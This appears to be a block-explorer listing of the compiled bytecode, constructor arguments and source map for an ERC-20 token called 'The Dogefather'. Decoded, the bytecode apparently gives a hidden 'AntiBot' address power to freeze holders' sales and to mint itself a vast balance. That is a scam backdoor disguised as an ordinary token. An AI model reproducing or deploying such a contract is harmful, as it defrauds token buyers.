5b6000818361125d91906119bb565b905092915050565b60008183611273919061198a565b905092915050565b600081836112899190611934565b905092915050565b6000813590506112a081611ba1565b92915050565b6000813590506112b581611bb8565b92915050565b6000602082840312156112cd57600080fd5b60006112db84828501611291565b91505092915050565b600080604083850312156112f757600080fd5b600061130585828601611291565b925050602061131685828601611291565b9150509250929050565b60008060006060848603121561133557600080fd5b600061134386828701611291565b935050602061135486828701611291565b9250506040611365868287016112a6565b9150509250925092565b6000806040838503121561138257600080fd5b600061139085828601611291565b92505060206113a1858286016112a6565b9150509250929050565b6113b481611a49565b82525050565b6113c381611a5b565b82525050565b60006113d482611918565b6113de8185611923565b93506113ee818560208601611a9e565b6113f781611b90565b840191505092915050565b600061140f602383611923565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611475602683611923565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114db602283611923565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611541601d83611923565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611581602683611923565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115e7602083611923565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611627602583611923565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061168d602483611923565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006116f3602583611923565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61175581611a87565b82525050565b61176481611a91565b82525050565b600060208201905061177f60008301846113ab565b92915050565b600060208201905061179a60008301846113ba565b92915050565b600060208201905081810360008301526117ba81846113c9565b905092915050565b600060208201905081810360008301526117db81611402565b9050919050565b600060208201905081810360008301526117fb81611468565b9050919050565b6000602082019050818103600083015261181b816114ce565b9050919050565b6000602082019050818103600083015261183b81611534565b9050919050565b6000602082019050818103600083015261185b81611574565b9050919050565b6000602082019050818103600083015261187b816115da565b9050919050565b6000602082019050818103600083015261189b8161161a565b9050919050565b600060208201905081810360008301526118bb81611680565b9050919050565b600060208201905081810360008301526118db816116e6565b9050919050565b60006020820190506118f7600083018461174c565b92915050565b6000602082019050611912600083018461175b565b92915050565b600081519050919050565b600082825260208201905092915050565b600061193f82611a87565b915061194a83611a87565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561197f5761197e611b03565b5b828201905092915050565b600061199582611a87565b91506119a083611a87565b9250826119b0576119af611b32565b5b828204905092915050565b60006119c682611a87565b91506119d183611a87565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611b03565b5b828202905092915050565b6000611a2082611a87565b9150611a2b83611a87565b925082821015611a3e57611a3d611b03565b5b828203905092915050565b6000611a5482611a67565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611abc578082015181840152602081019050611aa1565b83811115611acb576000848401525b50505050565b60006002820490506001821680611ae957607f821691505b60208210811415611afd57611afc611b61565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611baa81611a49565b8114611bb557600080fd5b50565b611bc181611a87565b8114611bcc57600080fd5b5056fea26469706673582212204d39db19dbb2033d967d2b70b19a8c05e7af68f0d42011680bb62f773bbe2ad364736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000f027acf5420758b352c1c024d5020b25471ed503000000000000000000000000000000000000000000000000000000000000000e54686520446f6765666174686572000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a446f676566617468657200000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063dd62ed3e11610071578063dd62ed3e14610359578063ebde9fa114610389578063f2fde38b146103a7578063f4cf1452146103c3578063f5dff741146103cd5761012c565b806395d89b41146102a357806396bfcd23146102c1578063a457c2d7146102dd578063a9059cbb1461030d578063ad55651f1461033d5761012c565b8063313ce567116100f4578063313ce567146101fd578063395093511461021b57806370a082311461024b578063715018a61461027b5780638da5cb5b146102855761012c565b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017f57806318160ddd146101af57806323b872dd146101cd575b600080fd5b6101396103eb565b60405161014691906117a0565b60405180910390f35b6101696004803603810190610164919061136f565b61047d565b6040516101769190611785565b60405180910390f35b610199600480360381019061019491906112bb565b6104a0565b6040516101a69190611785565b60405180910390f35b6101b76104f6565b6040516101c491906118e2565b60405180910390f35b6101e760048036038101906101e29190611320565b610500565b6040516101f49190611785565b60405180910390f35b61020561052f565b60405161021291906118fd565b60405180910390f35b6102356004803603810190610230919061136f565b610538565b6040516102429190611785565b60405180910390f35b610265600480360381019061026091906112bb565b61056f565b60405161027291906118e2565b60405180910390f35b6102836105b8565b005b61028d6105cc565b60405161029a919061176a565b60405180910390f35b6102ab6105f5565b6040516102b891906117a0565b60405180910390f35b6102db60048036038101906102d691906112bb565b610687565b005b6102f760048036038101906102f2919061136f565b610740565b6040516103049190611785565b60405180910390f35b6103276004803603810190610322919061136f565b6107b7565b6040516103349190611785565b60405180910390f35b610357600480360381019061035291906112bb565b6107da565b005b610373600480360381019061036e91906112e4565b610893565b60405161038091906118e2565b60405180910390f35b61039161091a565b60405161039e91906118e2565b60405180910390f35b6103c160048036038101906103bc91906112bb565b610924565b005b6103cb6109a8565b005b6103d5610ac9565b6040516103e2919061176a565b60405180910390f35b6060600580546103fa90611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461042690611ad1565b80156104735780601f1061044857610100808354040283529160200191610473565b820191906000526020600020905b81548152906001019060200180831161045657829003601f168201915b5050505050905090565b600080610488610aef565b9050610495818585610af7565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050b610aef565b9050610518858285610cc2565b610523858585610d4e565b60019150509392505050565b60006012905090565b600080610543610aef565b90506105648185856105558589610893565b61055f9190611934565b610af7565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c06110f7565b6105ca6000611175565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461060490611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461063090611ad1565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b61068f610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561073d576001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b60008061074b610aef565b905060006107598286610893565b90508381101561079e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610795906118c2565b60405180910390fd5b6107ab8286868403610af7565b60019250505092915050565b6000806107c2610aef565b90506107cf818585610d4e565b600191505092915050565b6107e2610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610890576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b61092c6110f7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906117e2565b60405180910390fd5b6109a581611175565b50565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166109e9610aef565b73ffffffffffffffffffffffffffffffffffffffff1614610a0957610ac7565b610a11610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610ac65761a7f8610a7161091a565b610a7b91906119bb565b60016000610a87610aef565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906118a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bce90611802565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cb591906118e2565b60405180910390a3505050565b6000610cce8484610893565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d485781811015610d3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3190611822565b60405180910390fd5b610d478484848403610af7565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db590611882565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906117c2565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610f1f57610ed261091a565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f1c9190611a15565b90505b81811015610f62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5990611842565b60405180910390fd5b610f75828261123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000610fe26064610fd46008548661124f90919063ffffffff16565b61126590919063ffffffff16565b90506110488161103a85600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127b90919063ffffffff16565b61123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110e891906118e2565b60405180910390a35050505050565b6110ff610aef565b73ffffffffffffffffffffffffffffffffffffffff1661111d6105cc565b73ffffffffffffffffffffffffffffffffffffffff1614611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a90611862565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836112479190611a15565b905092915050565b6000818361125d91906119bb565b905092915050565b60008183611273919061198a565b905092915050565b600081836112899190611934565b905092915050565b6000813590506112a081611ba1565b92915050565b6000813590506112b581611bb8565b92915050565b6000602082840312156112cd57600080fd5b60006112db84828501611291565b91505092915050565b600080604083850312156112f757600080fd5b600061130585828601611291565b925050602061131685828601611291565b9150509250929050565b60008060006060848603121561133557600080fd5b600061134386828701611291565b935050602061135486828701611291565b9250506040611365868287016112a6565b9150509250925092565b6000806040838503121561138257600080fd5b600061139085828601611291565b92505060206113a1858286016112a6565b9150509250929050565b6113b481611a49565b82525050565b6113c381611a5b565b82525050565b60006113d482611918565b6113de8185611923565b93506113ee818560208601611a9e565b6113f781611b90565b840191505092915050565b600061140f602383611923565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611475602683611923565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114db602283611923565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611541601d83611923565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611581602683611923565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115e7602083611923565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611627602583611923565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061168d602483611923565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006116f3602583611923565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61175581611a87565b82525050565b61176481611a91565b82525050565b600060208201905061177f60008301846113ab565b92915050565b600060208201905061179a60008301846113ba565b92915050565b600060208201905081810360008301526117ba81846113c9565b905092915050565b600060208201905081810360008301526117db81611402565b9050919050565b600060208201905081810360008301526117fb81611468565b9050919050565b6000602082019050818103600083015261181b816114ce565b9050919050565b6000602082019050818103600083015261183b81611534565b9050919050565b6000602082019050818103600083015261185b81611574565b9050919050565b6000602082019050818103600083015261187b816115da565b9050919050565b6000602082019050818103600083015261189b8161161a565b9050919050565b600060208201905081810360008301526118bb81611680565b9050919050565b600060208201905081810360008301526118db816116e6565b9050919050565b60006020820190506118f7600083018461174c565b92915050565b6000602082019050611912600083018461175b565b92915050565b600081519050919050565b600082825260208201905092915050565b600061193f82611a87565b915061194a83611a87565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561197f5761197e611b03565b5b828201905092915050565b600061199582611a87565b91506119a083611a87565b9250826119b0576119af611b32565b5b828204905092915050565b60006119c682611a87565b91506119d183611a87565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611b03565b5b828202905092915050565b6000611a2082611a87565b9150611a2b83611a87565b925082821015611a3e57611a3d611b03565b5b828203905092915050565b6000611a5482611a67565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611abc578082015181840152602081019050611aa1565b83811115611acb576000848401525b50505050565b60006002820490506001821680611ae957607f821691505b60208210811415611afd57611afc611b61565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611baa81611a49565b8114611bb557600080fd5b50565b611bc181611a87565b8114611bcc57600080fd5b5056fea26469706673582212204d39db19dbb2033d967d2b70b19a8c05e7af68f0d42011680bb62f773bbe2ad364736f6c63430008000033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000f027acf5420758b352c1c024d5020b25471ed503000000000000000000000000000000000000000000000000000000000000000e54686520446f6765666174686572000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a446f676566617468657200000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): The Dogefather
Arg [1] : symbol_ (string): Dogefather
Arg [2] : AntiBot (address): 0xF027acF5420758B352C1C024D5020b25471eD503
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000f027acf5420758b352c1c024d5020b25471ed503
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [4] : 54686520446f6765666174686572000000000000000000000000000000000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [6] : 446f676566617468657200000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
9585:11081:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11325:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13628:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10265:107;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12425:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14401:287;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12275:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15097:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12590:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8764:103;;;:::i;:::-;;8114:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11538:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10119:138;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15838:424;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12917:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9968:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10380:103;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9022:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10489:220;;;:::i;:::-;;9785:23;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11325:94;11371:13;11404:7;11397:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11325:94;:::o;13628:193::-;13703:4;13720:13;13736:12;:10;:12::i;:::-;13720:28;;13759:32;13768:5;13775:7;13784:6;13759:8;:32::i;:::-;13809:4;13802:11;;;13628:193;;;;:::o;10265:107::-;10322:4;10347:12;:17;10360:3;10347:17;;;;;;;;;;;;;;;;;;;;;;;;;10340:24;;10265:107;;;:::o;12425:102::-;12478:7;12505:14;;12498:21;;12425:102;:::o;14401:287::-;14524:4;14541:15;14559:12;:10;:12::i;:::-;14541:30;;14582:38;14598:4;14604:7;14613:6;14582:15;:38::i;:::-;14631:27;14641:4;14647:2;14651:6;14631:9;:27::i;:::-;14676:4;14669:11;;;14401:287;;;;;:::o;12275:85::-;12325:5;12350:2;12343:9;;12275:85;:::o;15097:238::-;15185:4;15202:13;15218:12;:10;:12::i;:::-;15202:28;;15241:64;15250:5;15257:7;15294:10;15266:25;15276:5;15283:7;15266:9;:25::i;:::-;:38;;;;:::i;:::-;15241:8;:64::i;:::-;15323:4;15316:11;;;15097:238;;;;:::o;12590:119::-;12656:7;12683:9;:18;12693:7;12683:18;;;;;;;;;;;;;;;;12676:25;;12590:119;;;:::o;8764:103::-;7998:15;:13;:15::i;:::-;8829:30:::1;8856:1;8829:18;:30::i;:::-;8764:103::o:0;8114:87::-;8160:7;8187:6;;;;;;;;;;;8180:13;;8114:87;:::o;11538:98::-;11586:13;11619:9;11612:16;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11538:98;:::o;10119:138::-;10186:12;:10;:12::i;:::-;10175:23;;:7;;;;;;;;;;;:23;;;10171:79;;;10234:4;10214:12;:17;10227:3;10214:17;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;10171:79;10119:138;:::o;15838:424::-;15931:4;15948:13;15964:12;:10;:12::i;:::-;15948:28;;15987:24;16014:25;16024:5;16031:7;16014:9;:25::i;:::-;15987:52;;16078:15;16058:16;:35;;16050:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;16163:60;16172:5;16179:7;16207:15;16188:16;:34;16163:8;:60::i;:::-;16250:4;16243:11;;;;15838:424;;;;:::o;12917:185::-;12988:4;13005:13;13021:12;:10;:12::i;:::-;13005:28;;13044;13054:5;13061:2;13065:6;13044:9;:28::i;:::-;13090:4;13083:11;;;12917:185;;;;:::o;9968:143::-;10039:12;:10;:12::i;:::-;10028:23;;:7;;;;;;;;;;;:23;;;10024:80;;;10087:5;10067:12;:17;10080:3;10067:17;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;10024:80;9968:143;:::o;13165:::-;13246:7;13273:11;:18;13285:5;13273:18;;;;;;;;;;;;;;;:27;13292:7;13273:27;;;;;;;;;;;;;;;;13266:34;;13165:143;;;;:::o;10380:103::-;10434:7;10461:14;;10454:21;;10380:103;:::o;9022:201::-;7998:15;:13;:15::i;:::-;9131:1:::1;9111:22;;:8;:22;;;;9103:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;9187:28;9206:8;9187:18;:28::i;:::-;9022:201:::0;:::o;10489:220::-;10549:7;;;;;;;;;;;10533:23;;:12;:10;:12::i;:::-;:23;;;10529:62;;10573:7;;10529:62;10616:12;:10;:12::i;:::-;10605:23;;:7;;;;;;;;;;;:23;;;10601:101;;;10685:5;10670:14;:12;:14::i;:::-;:20;;;;:::i;:::-;10644:9;:23;10654:12;:10;:12::i;:::-;10644:23;;;;;;;;;;;;;;;:46;;;;10601:101;10489:220;:::o;9785:23::-;;;;;;;;;;;;;:::o;6909:98::-;6962:7;6989:10;6982:17;;6909:98;:::o;19551:380::-;19704:1;19687:19;;:5;:19;;;;19679:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19785:1;19766:21;;:7;:21;;;;19758:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19869:6;19839:11;:18;19851:5;19839:18;;;;;;;;;;;;;;;:27;19858:7;19839:27;;;;;;;;;;;;;;;:36;;;;19907:7;19891:32;;19900:5;19891:32;;;19916:6;19891:32;;;;;;:::i;:::-;;;;;;;;19551:380;;;:::o;20222:441::-;20357:24;20384:25;20394:5;20401:7;20384:9;:25::i;:::-;20357:52;;20444:17;20424:16;:37;20420:236;;20506:6;20486:16;:26;;20478:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20582:51;20591:5;20598:7;20626:6;20607:16;:25;20582:8;:51::i;:::-;20420:236;20222:441;;;;:::o;16762:762::-;16921:1;16899:24;;:10;:24;;;;16891:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;16998:1;16984:16;;:2;:16;;;;16976:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;17051:15;17068:9;:21;17078:10;17068:21;;;;;;;;;;;;;;;;17051:38;;17132:5;17104:33;;:12;:24;17117:10;17104:24;;;;;;;;;;;;;;;;;;;;;;;;;:33;;;17100:113;;17186:14;:12;:14::i;:::-;17163:9;:21;17173:10;17163:21;;;;;;;;;;;;;;;;:38;;;;:::i;:::-;17154:47;;17100:113;17244:6;17233:7;:17;;17225:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17328:19;17340:6;17328:7;:11;;:19;;;;:::i;:::-;17304:9;:21;17314:10;17304:21;;;;;;;;;;;;;;;:43;;;;17358:13;17374:30;17400:3;17374:21;17385:9;;17374:6;:10;;:21;;;;:::i;:::-;:25;;:30;;;;:::i;:::-;17358:46;;17432:36;17462:5;17432:25;17450:6;17432:9;:13;17442:2;17432:13;;;;;;;;;;;;;;;;:17;;:25;;;;:::i;:::-;:29;;:36;;;;:::i;:::-;17415:9;:13;17425:2;17415:13;;;;;;;;;;;;;;;:53;;;;17505:2;17484:32;;17493:10;17484:32;;;17509:6;17484:32;;;;;;:::i;:::-;;;;;;;;16762:762;;;;;:::o;8279:134::-;8356:12;:10;:12::i;:::-;8345:23;;:7;:5;:7::i;:::-;:23;;;8337:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8279:134::o;9383:191::-;9457:16;9476:6;;;;;;;;;;;9457:25;;9502:8;9493:6;;:17;;;;;;;;;;;;;;;;;;9557:8;9526:40;;9547:8;9526:40;;;;;;;;;;;;9383:191;;:::o;3105:98::-;3163:7;3194:1;3190;:5;;;;:::i;:::-;3183:12;;3105:98;;;;:::o;3462:::-;3520:7;3551:1;3547;:5;;;;:::i;:::-;3540:12;;3462:98;;;;:::o;3861:::-;3919:7;3950:1;3946;:5;;;;:::i;:::-;3939:12;;3861:98;;;;:::o;2724:::-;2782:7;2813:1;2809;:5;;;;:::i;:::-;2802:12;;2724:98;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:118::-;2036:24;2054:5;2036:24;:::i;:::-;2031:3;2024:37;2014:53;;:::o;2073:109::-;2154:21;2169:5;2154:21;:::i;:::-;2149:3;2142:34;2132:50;;:::o;2188:364::-;;2304:39;2337:5;2304:39;:::i;:::-;2359:71;2423:6;2418:3;2359:71;:::i;:::-;2352:78;;2439:52;2484:6;2479:3;2472:4;2465:5;2461:16;2439:52;:::i;:::-;2516:29;2538:6;2516:29;:::i;:::-;2511:3;2507:39;2500:46;;2280:272;;;;;:::o;2558:367::-;;2721:67;2785:2;2780:3;2721:67;:::i;:::-;2714:74;;2818:34;2814:1;2809:3;2805:11;2798:55;2884:5;2879:2;2874:3;2870:12;2863:27;2916:2;2911:3;2907:12;2900:19;;2704:221;;;:::o;2931:370::-;;3094:67;3158:2;3153:3;3094:67;:::i;:::-;3087:74;;3191:34;3187:1;3182:3;3178:11;3171:55;3257:8;3252:2;3247:3;3243:12;3236:30;3292:2;3287:3;3283:12;3276:19;;3077:224;;;:::o;3307:366::-;;3470:67;3534:2;3529:3;3470:67;:::i;:::-;3463:74;;3567:34;3563:1;3558:3;3554:11;3547:55;3633:4;3628:2;3623:3;